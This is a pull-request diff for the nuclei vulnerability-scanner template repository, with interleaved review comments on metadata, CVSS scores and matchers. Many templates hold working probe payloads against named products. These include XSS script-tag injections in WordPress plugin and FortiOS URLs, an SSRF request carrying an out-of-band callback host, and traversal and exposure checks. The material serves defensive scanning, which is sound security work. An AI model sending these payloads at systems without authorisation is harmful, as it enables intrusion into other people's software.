Merge pull request #1 from projectdiscovery/master

Update
patch-1
Dhiyaneshwaran 2022-01-29 21:10:01 +05:30 committed by GitHub
commit 3b5e9039d4
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
56 changed files with 3166 additions and 2656 deletions

View File

@ -0,0 +1,30 @@
name: 📑 Template-DB Indexer
on:
push:
tags:
- '*'
workflow_dispatch:
jobs:
index:
runs-on: ubuntu-latest
steps:
- uses: actions/setup-go@v2
with:
go-version: 1.17
- name: Intalling Indexer
run: |
git config --global url."https://${{ secrets.ACCESS_TOKEN }}@github".insteadOf https://github
git clone https://github.com/projectdiscovery/nucleish-api.git
cd nucleish-api/cmd/generate-index/
go install
- name: Generate Index
env:
AWS_ACCESS_KEY: ${{ secrets.AWS_ACCESS_KEY }}
AWS_SECRET_KEY: ${{ secrets.AWS_SECRET_KEY }}
run: |
generate-index -mode templates
generate-index -mode changelog
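Review bot: the `insteadOf` rewrite in the "Intalling Indexer" step writes `${{ secrets.ACCESS_TOKEN }}` into the runner's global git config under the prefix `https://github`, so the token is attached to every later git fetch in the job whose URL begins with that prefix, not only the clone that follows it. Narrow the rewrite to `https://github.com/` (with the trailing slash), or pass the token to that one clone only and unset the rewrite afterwards. Two smaller points: the step name misspells "Installing", and `actions/setup-go@v2` is pinned to a floating major tag rather than a commit SHA, which is the usual hardening for a workflow that holds AWS credentials in `env`.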

View File

@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags,
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 960 | daffainfo | 529 | cves | 966 | info | 994 | http | 2668 | | cve | 975 | daffainfo | 529 | cves | 981 | info | 1015 | http | 2716 |
| lfi | 401 | dhiyaneshdk | 360 | exposed-panels | 384 | high | 731 | file | 57 | | lfi | 403 | dhiyaneshdk | 369 | exposed-panels | 398 | high | 739 | file | 57 |
| panel | 385 | pikpikcu | 295 | vulnerabilities | 377 | medium | 547 | network | 48 | | panel | 398 | pikpikcu | 297 | vulnerabilities | 380 | medium | 558 | network | 48 |
| xss | 297 | pdteam | 241 | technologies | 214 | critical | 354 | dns | 16 | | xss | 304 | pdteam | 246 | technologies | 222 | critical | 361 | dns | 16 |
| wordpress | 277 | geeknik | 173 | exposures | 199 | low | 171 | | | | wordpress | 281 | geeknik | 174 | exposures | 199 | low | 172 | | |
| exposure | 273 | dwisiswant0 | 160 | workflows | 182 | | | | | | exposure | 273 | dwisiswant0 | 160 | misconfiguration | 186 | | | | |
| rce | 253 | gy741 | 98 | misconfiguration | 182 | | | | | | rce | 256 | gy741 | 102 | workflows | 184 | | | | |
| tech | 224 | pussycat0x | 98 | token-spray | 146 | | | | | | tech | 234 | pussycat0x | 100 | token-spray | 146 | | | | |
| cve2021 | 214 | 0x_akoko | 96 | default-logins | 67 | | | | | | cve2021 | 222 | 0x_akoko | 97 | default-logins | 71 | | | | |
| wp-plugin | 187 | princechaddha | 81 | takeovers | 65 | | | | | | wp-plugin | 191 | princechaddha | 85 | takeovers | 65 | | | | |
**203 directories, 3004 files**. **212 directories, 3054 files**.
</td> </td>
</tr> </tr>

File diff suppressed because one or more lines are too long

File diff suppressed because it is too large

View File

@ -1,12 +1,12 @@
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 960 | daffainfo | 529 | cves | 966 | info | 994 | http | 2668 | | cve | 975 | daffainfo | 529 | cves | 981 | info | 1015 | http | 2716 |
| lfi | 401 | dhiyaneshdk | 360 | exposed-panels | 384 | high | 731 | file | 57 | | lfi | 403 | dhiyaneshdk | 369 | exposed-panels | 398 | high | 739 | file | 57 |
| panel | 385 | pikpikcu | 295 | vulnerabilities | 377 | medium | 547 | network | 48 | | panel | 398 | pikpikcu | 297 | vulnerabilities | 380 | medium | 558 | network | 48 |
| xss | 297 | pdteam | 241 | technologies | 214 | critical | 354 | dns | 16 | | xss | 304 | pdteam | 246 | technologies | 222 | critical | 361 | dns | 16 |
| wordpress | 277 | geeknik | 173 | exposures | 199 | low | 171 | | | | wordpress | 281 | geeknik | 174 | exposures | 199 | low | 172 | | |
| exposure | 273 | dwisiswant0 | 160 | workflows | 182 | | | | | | exposure | 273 | dwisiswant0 | 160 | misconfiguration | 186 | | | | |
| rce | 253 | gy741 | 98 | misconfiguration | 182 | | | | | | rce | 256 | gy741 | 102 | workflows | 184 | | | | |
| tech | 224 | pussycat0x | 98 | token-spray | 146 | | | | | | tech | 234 | pussycat0x | 100 | token-spray | 146 | | | | |
| cve2021 | 214 | 0x_akoko | 96 | default-logins | 67 | | | | | | cve2021 | 222 | 0x_akoko | 97 | default-logins | 71 | | | | |
| wp-plugin | 187 | princechaddha | 81 | takeovers | 65 | | | | | | wp-plugin | 191 | princechaddha | 85 | takeovers | 65 | | | | |
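Review bot: this table is identical to the one changed in the README hunk above (same counts, same swapped misconfiguration/workflows rows), so the two copies are being maintained by hand in parallel. If one is regenerated without the other they drift; generate both from the same script run, and say in a comment which script produces them.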

View File

@ -4,9 +4,14 @@ info:
name: Xiuno BBS CNVD-2019-01348 name: Xiuno BBS CNVD-2019-01348
author: princechaddha author: princechaddha
severity: medium severity: medium
description: The Xiuno BBS system has a system reinstallation vulnerability. The vulnerability stems from the failure to protect or filter the installation directory after the system is installed. Attackers can directly reinstall the system through the installation page. description: Xiuno BBS system has a system reinstallation vulnerability that could allow an attacker to directly reinstall the system through the installation page.
reference: https://www.cnvd.org.cn/flaw/show/CNVD-2019-01348 reference: https://www.cnvd.org.cn/flaw/show/CNVD-2019-01348
tags: xiuno,cnvd,cnvd2019 tags: xiuno,cnvd,cnvd2019
remediation: There is currently no patch available.
classification:
cvss-metrics: CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
cvss-score: 6.5
cwe-id: CWE-276
requests: requests:
- method: GET - method: GET
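Review bot: the new CVSS vector contradicts the description in this hunk: `AV:A` scopes the attack to an adjacent network and `C:N/I:N/A:H` records only an availability impact, while the description says an attacker can reinstall the system through a web installation page, which is a network-reachable integrity (and very likely confidentiality) impact. Re-derive the vector from the description, or add a reference showing where the 6.5 score and `CWE-276` were taken from. The reworded description also drops the root cause stated in the old text ("failure to protect or filter the installation directory after the system is installed"); keeping that sentence tells a defender what to check.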
@ -27,3 +32,5 @@ requests:
- "/view/js/xiuno.js" - "/view/js/xiuno.js"
- "Choose Language (选择语言)" - "Choose Language (选择语言)"
condition: and condition: and
# Enhanced by mp on 2022/01/26

View File

@ -643,7 +643,7 @@
"author": "forgedhallpass", "author": "forgedhallpass",
"links": { "links": {
"github": "https://www.github.com/forgedhallpass", "github": "https://www.github.com/forgedhallpass",
"twitter": "", "twitter": "https://twitter.com/forgedhallpass",
"linkedin": "", "linkedin": "",
"website": "", "website": "",
"email": "" "email": ""

View File

@ -5,10 +5,13 @@ info:
author: r3naissance author: r3naissance
severity: low severity: low
description: Frontpage Server Extensions allows remote attackers to determine the name of the anonymous account via an RPC POST request to shtml.dll in the /_vti_bin/ virtual directory. description: Frontpage Server Extensions allows remote attackers to determine the name of the anonymous account via an RPC POST request to shtml.dll in the /_vti_bin/ virtual directory.
remediation: Upgrade to the latest version.
reference: reference:
- https://nvd.nist.gov/vuln/detail/CVE-2000-0114 - https://nvd.nist.gov/vuln/detail/CVE-2000-0114
- https://www.exploit-db.com/exploits/19897 - https://www.exploit-db.com/exploits/19897
tags: cve,cve2000,frontpage,microsoft tags: cve,cve2000,frontpage,microsoft
classification:
cve-id: CVE-2000-0114
requests: requests:
- method: GET - method: GET
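Review bot: `remediation: Upgrade to the latest version.` is not actionable for this finding; FrontPage Server Extensions is a discontinued product, so there is no current version to move to. The effective remediation for a CVE-2000-0114 hit is to remove or disable the extensions (the `/_vti_bin/` handlers named in the description) on the web server, and the field should say so.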
@ -25,3 +28,6 @@ requests:
part: body part: body
words: words:
- "_vti_bin/shtml.dll" - "_vti_bin/shtml.dll"
# Enhanced by mp on 2022/01/27

View File

@ -4,9 +4,14 @@ info:
name: SquirrelMail 1.4.x - Folder Name Cross-Site Scripting name: SquirrelMail 1.4.x - Folder Name Cross-Site Scripting
author: dhiyaneshDk author: dhiyaneshDk
severity: medium severity: medium
description: "Multiple cross-site scripting (XSS) vulnerabilities in SquirrelMail 1.4.2 allow remote attackers to execute arbitrary script as other users and possibly steal authentication information via multiple attack vectors, including the mailbox parameter in compose.php." description: Multiple cross-site scripting (XSS) vulnerabilities in SquirrelMail 1.4.2 allow remote attackers to execute arbitrary script and possibly steal authentication information via multiple attack vectors, including the mailbox parameter in compose.php.
reference: https://www.exploit-db.com/exploits/24068 remediation: Upgrade to the latest version.
reference:
- https://www.exploit-db.com/exploits/24068
- ftp://patches.sgi.com/support/free/security/advisories/20040604-01-U.asc
tags: xss,squirrelmail,cve2004,cve tags: xss,squirrelmail,cve2004,cve
classification:
cve-id: CVE-2004-0519
requests: requests:
- method: GET - method: GET
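Review bot: the second reference added here is an `ftp://` URL (`ftp://patches.sgi.com/...`), which most browsers no longer open and which may not be reachable at all; since this hunk also adds `cve-id: CVE-2004-0519`, the NVD entry `https://nvd.nist.gov/vuln/detail/CVE-2004-0519` is the durable reference and matches what the CVE-2000-0114 and CVE-2008-6172 templates in this PR do. Note also that the reworded description drops "as other users", which is the part of the original sentence that states the impact (the script runs in other users' sessions).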
@ -28,3 +33,7 @@ requests:
part: header part: header
words: words:
- "text/html" - "text/html"
# Enhanced by mp on 2022/01/27
# Enhanced by mp on 2022/01/27
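Review bot: the `# Enhanced by mp on 2022/01/27` trailer appears twice at the end of this file; drop one copy so it matches the other templates in this PR, which carry it once.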

View File

@ -4,11 +4,14 @@ info:
name: Joomla! Component RWCards 3.0.11 - Local File Inclusion name: Joomla! Component RWCards 3.0.11 - Local File Inclusion
author: daffainfo author: daffainfo
severity: high severity: high
description: Directory traversal vulnerability in captcha/captcha_image.php in the RWCards (com_rwcards) 3.0.11 component for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the img parameter. description: A directory traversal vulnerability in captcha/captcha_image.php in the RWCards (com_rwcards) 3.0.11 component for Joomla! when magic_quotes_gpc is disabled allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the img parameter.
remediation: Upgrade to the latest version.
reference: reference:
- https://www.exploit-db.com/exploits/6817 - https://www.exploit-db.com/exploits/6817
- https://www.cvedetails.com/cve/CVE-2008-6172 - https://www.cvedetails.com/cve/CVE-2008-6172
tags: cve,cve2008,joomla,lfi tags: cve,cve2008,joomla,lfi
classification:
cve-id: CVE-2008-6172
requests: requests:
- method: GET - method: GET
@ -25,3 +28,5 @@ requests:
- type: status - type: status
status: status:
- 200 - 200
# Enhanced by mp on 2022/01/27

View File

@ -18,7 +18,7 @@ info:
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/wp-content/plugins/importlegacymedia/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - "{{BaseURL}}/wp-content/plugins/import-legacy-media/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and matchers-condition: and
matchers: matchers:

View File

@ -18,7 +18,7 @@ info:
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/wp-content/plugins/podcastchannels/getid3/demos/demo.write.php?Filename=Filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&" - "{{BaseURL}}/wp-content/plugins/podcast-channels/getid3/demos/demo.write.php?Filename=Filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&"
matchers-condition: and matchers-condition: and
matchers: matchers:

View File

@ -18,7 +18,7 @@ info:
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/wp-content/plugins/shortcodeninja/preview-shortcode-external.php?shortcode=shortcode%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3e" - "{{BaseURL}}/wp-content/plugins/shortcode-ninja/preview-shortcode-external.php?shortcode=shortcode%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3e"
matchers-condition: and matchers-condition: and
matchers: matchers:

View File

@ -18,7 +18,7 @@ info:
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/wp-content/plugins/swipehqpaymentgatewaywoocommerce/test-plugin.php?api_url=api_url%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E " - "{{BaseURL}}/wp-content/plugins/swipehq-payment-gateway-woocommerce/test-plugin.php?api_url=api_url%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E "
matchers-condition: and matchers-condition: and
matchers: matchers:
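Review bot: the new path string still ends with a space inside the quotes (`...%3C/script%3E "`), carried over from the old line; that trailing space becomes part of the request URL, raw or encoded, and can make the request fail or the reflection check miss. Strip it so the path ends at `%3E`.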

View File

@ -18,7 +18,7 @@ info:
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/wp-content/plugins/ultimateweatherplugin/magpierss/scripts/magpie_debug.php?url=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - "{{BaseURL}}/wp-content/plugins/ultimate-weather-plugin/magpierss/scripts/magpie_debug.php?url=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and matchers-condition: and
matchers: matchers:

View File

@ -18,7 +18,7 @@ info:
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/wp-content/plugins/wpplanet/rss.class/scripts/magpie_debug.php?url=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - "{{BaseURL}}/wp-content/plugins/wp-planet/rss.class/scripts/magpie_debug.php?url=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and matchers-condition: and
matchers: matchers:

View File

@ -3,7 +3,7 @@ info:
author: Random_Robbie author: Random_Robbie
name: Apache Struts2 RCE name: Apache Struts2 RCE
severity: critical severity: critical
description: Struts is vulnerable to remote command injection attacks through incorrectly parsing an attackers invalid Content-Type HTTP header. The Struts vulnerability allows these commands to be executed under the privileges of the Web server. description: Struts is vulnerable to remote command injection attacks through incorrectly parsing an attacker's invalid Content-Type HTTP header. The Struts vulnerability allows these commands to be executed under the privileges of the Web server.
tags: cve,cve2017,struts,rce,apache tags: cve,cve2017,struts,rce,apache
reference: https://github.com/mazen160/struts-pwn reference: https://github.com/mazen160/struts-pwn
classification: classification:

View File

@ -1,7 +1,7 @@
id: CVE-2017-7391 id: CVE-2017-7391
info: info:
name: Magmi Cross-Site Scripting v.0.7.22 name: Magmi Cross-Site Scripting v.0.7.22
author: pikpikcu author: pikpikcu
severity: medium severity: medium
description: A Cross-Site Scripting (XSS) was discovered in 'Magmi 0.7.22'. The vulnerability exists due to insufficient filtration of user-supplied data (prefix) passed to the 'magmi-git-master/magmi/web/ajax_gettime.php' URL. description: A Cross-Site Scripting (XSS) was discovered in 'Magmi 0.7.22'. The vulnerability exists due to insufficient filtration of user-supplied data (prefix) passed to the 'magmi-git-master/magmi/web/ajax_gettime.php' URL.
@ -25,12 +25,13 @@ requests:
- type: status - type: status
status: status:
- 200 - 200
- type: word
words:
- '"><script>alert(document.domain);</script><'
part: body
- type: word - type: word
part: body
words:
- '"><script>alert(document.domain);</script><'
- type: word
part: header
words: words:
- "text/html" - "text/html"
part: header

View File

@ -4,7 +4,7 @@ info:
name: LG NAS Devices - Remote Code Execution (Unauthenticated) name: LG NAS Devices - Remote Code Execution (Unauthenticated)
author: gy741 author: gy741
severity: critical severity: critical
description: The vulnerability (CVE-2018-10818) is a pre-auth remote command injection vulnerability found in the majority of LG NAS devices. You cannot simply log in with any random username and password. However, there lies a command injection vulnerability in the “password” parameter. description: The vulnerability (CVE-2018-10818) is a pre-auth remote command injection vulnerability found in the majority of LG NAS devices. You cannot simply log in with any random username and password. However, there lies a command injection vulnerability in the "password" parameter.
reference: reference:
- https://www.vpnmentor.com/blog/critical-vulnerability-found-majority-lg-nas-devices/ - https://www.vpnmentor.com/blog/critical-vulnerability-found-majority-lg-nas-devices/
- https://medium.com/@0x616163/lg-n1a1-unauthenticated-remote-command-injection-cve-2018-14839-9d2cf760e247 - https://medium.com/@0x616163/lg-n1a1-unauthenticated-remote-command-injection-cve-2018-14839-9d2cf760e247
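Review bot: the description identifies the issue as CVE-2018-10818, but the second reference (`...cve-2018-14839...`) is a write-up for CVE-2018-14839 on the LG N1A1. Confirm which CVE this template's request actually covers and either drop the mismatched reference or state in the description that both identifiers describe the same password-parameter injection. The quotation-mark fix itself is fine.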

View File

@ -4,7 +4,7 @@ info:
name: D-Link Routers - Directory Traversal name: D-Link Routers - Directory Traversal
author: daffainfo author: daffainfo
severity: high severity: high
description: Directory traversal vulnerability in the web interface on D-Link routers DWR-116 through 1.06, DIR-140L through 1.02, DIR-640L through 1.02,DWR-512 through 2.02,DWR-712 through 2.02,DWR-912 through 2.02, DWR-921 through 2.02, DWR-111 through 1.01, and probably others with the same type of firmware allows remote attackers to read arbitrary files via a /.. or // after “GET /uir” in an HTTP request. description: Directory traversal vulnerability in the web interface on D-Link routers DWR-116 through 1.06, DIR-140L through 1.02, DIR-640L through 1.02,DWR-512 through 2.02,DWR-712 through 2.02,DWR-912 through 2.02, DWR-921 through 2.02, DWR-111 through 1.01, and probably others with the same type of firmware allows remote attackers to read arbitrary files via a /.. or // after "GET /uir" in an HTTP request.
reference: reference:
- https://www.exploit-db.com/exploits/45678 - https://www.exploit-db.com/exploits/45678
- https://nvd.nist.gov/vuln/detail/CVE-2018-10822 - https://nvd.nist.gov/vuln/detail/CVE-2018-10822

View File

@ -10,7 +10,7 @@ info:
caused by improper neutralization of special elements. caused by improper neutralization of special elements.
An unauthenticated remote malicious user (or attacker) can supply An unauthenticated remote malicious user (or attacker) can supply
specially crafted request parameters against Spring Data REST backed HTTP resources specially crafted request parameters against Spring Data REST backed HTTP resources
or using Spring Datas projection-based request payload binding hat can lead to a remote code execution attack. or using Spring Data's projection-based request payload binding hat can lead to a remote code execution attack.
reference: https://nvd.nist.gov/vuln/detail/CVE-2018-1273 reference: https://nvd.nist.gov/vuln/detail/CVE-2018-1273
tags: cve,cve2018,vmware,rce,spring tags: cve,cve2018,vmware,rce,spring
classification: classification:
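Review bot: the apostrophe fix leaves the neighbouring typo in place: "request payload binding hat can lead to" should read "that can lead to". Since the line is being touched anyway, fix both.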

View File

@ -2,34 +2,38 @@ id: CVE-2018-13380
info: info:
name: Fortinet FortiOS Cross-Site Scripting name: Fortinet FortiOS Cross-Site Scripting
author: shelld3v author: shelld3v,AaronChen0
severity: medium severity: medium
description: A Cross-site Scripting (XSS) vulnerability in Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.0 to 5.6.7, 5.4.0 to 5.4.12, 5.2 and below versions under SSL VPN web portal allows attacker to execute unauthorized malicious script code via the error or message handling parameters. description: A Cross-site Scripting (XSS) vulnerability in Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.0 to 5.6.7, 5.4.0 to 5.4.12, 5.2 and below versions under SSL VPN web portal allows attacker to execute unauthorized malicious script code via the error or message handling parameters.
reference: https://nvd.nist.gov/vuln/detail/CVE-2018-13380 reference:
tags: cve,cve2018,fortios,xss,fortinet - https://nvd.nist.gov/vuln/detail/CVE-2018-13380
- https://blog.orange.tw/2019/08/attacking-ssl-vpn-part-2-breaking-the-fortigate-ssl-vpn.html
classification: classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10 cvss-score: 6.10
cve-id: CVE-2018-13380 cve-id: CVE-2018-13380
cwe-id: CWE-79 cwe-id: CWE-79
tags: cve,cve2018,fortios,xss,fortinet
requests: requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/message?title=x&msg=%26%23%3Csvg/onload=alert(1337)%3E" - "{{BaseURL}}/message?title=x&msg=%26%23%3Csvg/onload=alert(1337)%3E%3B"
- "{{BaseURL}}/remote/error?errmsg=ABABAB--%3E%3Cscript%3Ealert(1337)%3C/script%3E" - "{{BaseURL}}/remote/error?errmsg=ABABAB--%3E%3Cscript%3Ealert(1337)%3C/script%3E"
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: word - type: word
part: body
words: words:
- "<svg/onload=alert(1337)>" - "<svg/onload=alert(1337)>"
part: body - "<script>alert(1337)</script>"
condition: or
- type: word - type: word
part: header
words: words:
- "application/json" - "application/json"
part: header
negative: true negative: true
- type: status - type: status

View File

@ -4,7 +4,7 @@ info:
name: Unauthenticated File upload wpDiscuz WordPress plugin RCE name: Unauthenticated File upload wpDiscuz WordPress plugin RCE
author: Ganofins author: Ganofins
severity: critical severity: critical
description: WordPress wpDiscuz plugin version 7.0.4. This flaw gave unauthenticated attackers the ability to upload arbitrary files, including PHP files, and achieve remote code execution on a vulnerable sites server. description: WordPress wpDiscuz plugin version 7.0.4. This flaw gave unauthenticated attackers the ability to upload arbitrary files, including PHP files, and achieve remote code execution on a vulnerable site's server.
reference: https://github.com/suncsr/wpDiscuz_unauthenticated_arbitrary_file_upload/blob/main/README.md reference: https://github.com/suncsr/wpDiscuz_unauthenticated_arbitrary_file_upload/blob/main/README.md
tags: cve,cve2020,wordpress,wp-plugin,rce,upload tags: cve,cve2020,wordpress,wp-plugin,rce,upload
classification: classification:

View File

@ -4,7 +4,7 @@ info:
name: Cacti v1.2.8 - Unauthenticated Remote Code Execution name: Cacti v1.2.8 - Unauthenticated Remote Code Execution
author: gy741 author: gy741
severity: high severity: high
description: This vulnerability could be exploited without authentication if Cacti is enabling “Guest Realtime Graphs” privilege, So in this case no need for the authentication part and you can just use the following code to exploit the vulnerability description: This vulnerability could be exploited without authentication if Cacti is enabling "Guest Realtime Graphs" privilege, So in this case no need for the authentication part and you can just use the following code to exploit the vulnerability.
reference: reference:
- https://shells.systems/cacti-v1-2-8-authenticated-remote-code-execution-cve-2020-8813/ - https://shells.systems/cacti-v1-2-8-authenticated-remote-code-execution-cve-2020-8813/
tags: cve,cve2020,cacti,rce,oast tags: cve,cve2020,cacti,rce,oast
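Review bot: the description still reads as text lifted from the referenced blog post ("...you can just use the following code to exploit the vulnerability") and the "following code" is not part of this template, so the sentence dangles; this hunk only adds a full stop. Reword it to stand alone, for example: Cacti 1.2.8 is exploitable without authentication when the "Guest Realtime Graphs" privilege is enabled for the guest account. That also reconciles the template name ("Unauthenticated") with the reference URL's slug ("authenticated"), since the guest-privilege setting is what removes the login requirement.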

View File

@ -0,0 +1,38 @@
id: CVE-2021-21973
info:
name: VMware vCenter Unauthenticated SSRF
author: pdteam
severity: medium
description: The vSphere Client (HTML5) contains an SSRF (Server Side Request Forgery) vulnerability due to improper validation of URLs in a vCenter Server plugin. A malicious actor with network access to port 443 may exploit this issue by sending a POST request to vCenter Server plugin leading to information disclosure. This affects VMware vCenter Server (7.x before 7.0 U1c, 6.7 before 6.7 U3l and 6.5 before 6.5 U3n) and VMware Cloud Foundation (4.x before 4.2 and 3.x before 3.10.1.2).
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2021-21973
- https://twitter.com/osama_hroot/status/1365586206982082560
- https://twitter.com/bytehx343/status/1486582542807420928
tags: cve,cve2021,vmware,ssrf,vcenter,oast
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.30
cve-id: CVE-2021-21973
cwe-id: CWE-918
requests:
- raw:
- |
GET /ui/vropspluginui/rest/services/getvcdetails HTTP/1.1
Host: {{Hostname}}
Vcip: {{interactsh-url}}
Vcpassword: {{rand_base(6)}}
Vcusername: {{rand_base(6)}}
Reqresource: {{rand_base(6)}}
matchers-condition: and
matchers:
- type: status
status:
- 500
- type: word
part: body
words:
- "The server sent HTTP status code 200"
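Review bot: the template depends on an out-of-band callback (`Vcip: {{interactsh-url}}`, tag `oast`), but the matchers only check for a 500 whose body contains "The server sent HTTP status code 200", i.e. they rely on the plugin reporting the outcome of its own outbound request. Where vCenter has no egress to the interactsh host that request fails and the template reports nothing, even though the endpoint is reachable unauthenticated, so document this false-negative case in the description or add a word matcher on `part: interactsh_protocol` so a received callback is recorded independently of the body text.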

View File

@ -4,7 +4,7 @@ info:
author: dhiyaneshDk,philippedelteil author: dhiyaneshDk,philippedelteil
severity: critical severity: critical
name: Confluence Server OGNL injection - RCE name: Confluence Server OGNL injection - RCE
description: In affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that would allow an authenticated user, and in some instances an unauthenticated user, to execute arbitrary code on a Confluence Server or Data Center instance. The vulnerable endpoints can be accessed by a non-administrator user or unauthenticated user if Allow people to sign up to create their account is enabled. To check whether this is enabled go to COG > User Management > User Signup Options. The affected versions are before version 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5. description: In affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that would allow an authenticated user, and in some instances an unauthenticated user, to execute arbitrary code on a Confluence Server or Data Center instance. The vulnerable endpoints can be accessed by a non-administrator user or unauthenticated user if 'Allow people to sign up to create their account' is enabled. To check whether this is enabled go to COG > User Management > User Signup Options. The affected versions are before version 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5.
tags: cve,cve2021,rce,confluence,injection,ognl tags: cve,cve2021,rce,confluence,injection,ognl
reference: reference:
- https://jira.atlassian.com/browse/CONFSERVER-67940 - https://jira.atlassian.com/browse/CONFSERVER-67940

View File

@ -0,0 +1,47 @@
id: CVE-2021-32682
info:
name: elFinder - Multiple vulnerabilities leading to RCE
author: smaranchand
severity: critical
tags: cve,cve2021,elfinder,misconfig,rce,oss
description: elFinder is an open-source file manager for web, written in JavaScript using jQuery UI. Several vulnerabilities affect elFinder 2.1.58. These vulnerabilities can allow an attacker to execute arbitrary code and commands on the server hosting the elFinder PHP connector, even with minimal configuration. The issues were patched in version 2.1.59. As a workaround, ensure the connector is not exposed without authentication.
reference:
- https://smaranchand.com.np/2022/01/organization-vendor-application-security/
- https://blog.sonarsource.com/elfinder-case-study-of-web-file-manager-vulnerabilities
- https://github.com/Studio-42/elFinder/security/advisories/GHSA-wph3-44rj-92pr
- https://nvd.nist.gov/vuln/detail/CVE-2021-32682
remediation: Update to elFinder 2.1.59
metadata:
github: https://github.com/Studio-42/elFinder
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.80
cve-id: CVE-2021-32682
cwe-id: CWE-22,CWE-78,CWE-918
requests:
- method: GET
path:
- "{{BaseURL}}/admin/elfinder/elfinder-cke.html"
- "{{BaseURL}}/assets/backend/elfinder/elfinder-cke.html"
- "{{BaseURL}}/assets/elFinder-2.1.9/elfinder.html"
- "{{BaseURL}}/assets/elFinder/elfinder.html"
- "{{BaseURL}}/backend/elfinder/elfinder-cke.html"
- "{{BaseURL}}/elfinder/elfinder-cke.html"
- "{{BaseURL}}/uploads/assets/backend/elfinder/elfinder-cke.html"
- "{{BaseURL}}/uploads/assets/backend/elfinder/elfinder.html"
- "{{BaseURL}}/uploads/elfinder/elfinder-cke.html"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
words:
- "elfinder"
- "php/connector"
condition: and
- type: status
status:
- 200
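Review bot: the matchers confirm only that an elFinder page mentioning `php/connector` is served with a 200; nothing checks the version, while the description says the issues were fixed in 2.1.59 and the template is rated `critical`. As written, every exposed elFinder, patched or not, is reported as a critical CVE-2021-32682 hit. Either add a version check, if the project exposes a version string that can be matched, or state in the description that this is an exposure check for the connector and the version must be verified separately. Also, the first `words` matcher has no `part:` and so defaults to the body; make it explicit as the other templates in this PR do.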

View File

@ -13,7 +13,7 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.30 cvss-score: 5.30
cve-id: CVE-2021-38314 cve-id: CVE-2021-38314
description: "The Gutenberg Template Library & Redux Framework plugin <= 4.2.11 for WordPress registered several AJAX actions available to unauthenticated users in the `includes` function in `redux-core/class-redux-core.php` that were unique to a given site but deterministic and predictable given that they were based on an md5 hash of the site URL with a known salt value of '-redux' and an md5 hash of the previous hash with a known salt value of '-support'. These AJAX actions could be used to retrieve a list of active plugins and their versions, the site's PHP version, and an unsalted md5 hash of sites `AUTH_KEY` concatenated with the `SECURE_AUTH_KEY`." description: "The Gutenberg Template Library & Redux Framework plugin <= 4.2.11 for WordPress registered several AJAX actions available to unauthenticated users in the `includes` function in `redux-core/class-redux-core.php` that were unique to a given site but deterministic and predictable given that they were based on an md5 hash of the site URL with a known salt value of '-redux' and an md5 hash of the previous hash with a known salt value of '-support'. These AJAX actions could be used to retrieve a list of active plugins and their versions, the site's PHP version, and an unsalted md5 hash of site's `AUTH_KEY` concatenated with the `SECURE_AUTH_KEY`."
